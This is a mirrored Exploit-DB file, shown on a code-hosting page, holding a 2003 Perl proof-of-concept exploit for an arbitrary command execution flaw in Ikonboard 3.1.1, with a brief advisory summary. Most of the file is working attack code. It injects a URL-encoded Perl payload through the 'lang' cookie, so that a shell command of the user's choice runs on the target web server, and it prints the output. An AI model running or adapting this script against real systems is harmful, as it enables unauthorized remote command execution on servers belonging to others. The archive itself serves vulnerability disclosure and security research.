bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/webapps/22500.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

85 lines
No EOL
2.1 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/7361/info
It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.
An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard.
#!/usr/bin/perl
#
# Date: 5 May 2003
# Author: snooq [http://www.angelfire.com/linux/snooq/]
#
# Ikonboard 3.1.1 Remote Command Execution PoC
# ============================================
# This bug was found by Nick Cleaton.
#
# For more info and patch, go to:
# http://archives.neohapsis.com/archives/bugtraq/2003-04/0027.html
#
# Use at your very own risk.
#
# Greetz.. my team mates: JF, Nam, ET..
# And some new frens: Kader, Bufferoulis, Neil... ;)
#
use Socket;
use FileHandle;
if ($ARGV[0] eq '') {
print "Usage: $0 <host> [cmd] [path]\n";
exit;
}
my $port=80;
my $host=$ARGV[0];
my $addr=getaddr($ARGV[0]);
my $cmd=$ARGV[1]?($ARGV[1]):"/bin/uname -a";
my $path=$ARGV[2]?($ARGV[2]):"/cgi-bin/ikonboard.cgi";
my $buff=URLEncode(".\0\" unless(1);"
."print \"Content-type: text/plain\\r\\n\\r\\n\";"
."print \"---BEGIN---\\n\".`$cmd`.\"\\n---END---\";exit;#");
socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";
SOCKET->autoflush();
print SOCKET "GET $path HTTP/1.1\r\n";
print SOCKET "Host: $host\r\n";
print SOCKET "Cookie: lang=$buff\r\n";
print SOCKET "Connection: close\r\n\r\n";
print "Ikonboard Exploit, by snooq [ jinyean\@hotmail.com ]\n\n";
while (<SOCKET>) {
if (/^---BEGIN---/) {
print "> $cmd\n";
while (<SOCKET>){
if (/^---END---/) { exit; }
print;
}
}
}
print "$host seems not vulnerable.\n";
exit;
sub getaddr {
my $host=($_[0]);
my $n=$host;
$n=~tr/\.//d;
if ($n=~m/\d+/) {
return pack('C4',split('\.',$host));
}
else {
return (gethostbyname($host))[4];
}
}
# URLEncode routine, courtesy of Glenn Fleishman
sub URLEncode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}
Reference in a new issue View git blame Copy permalink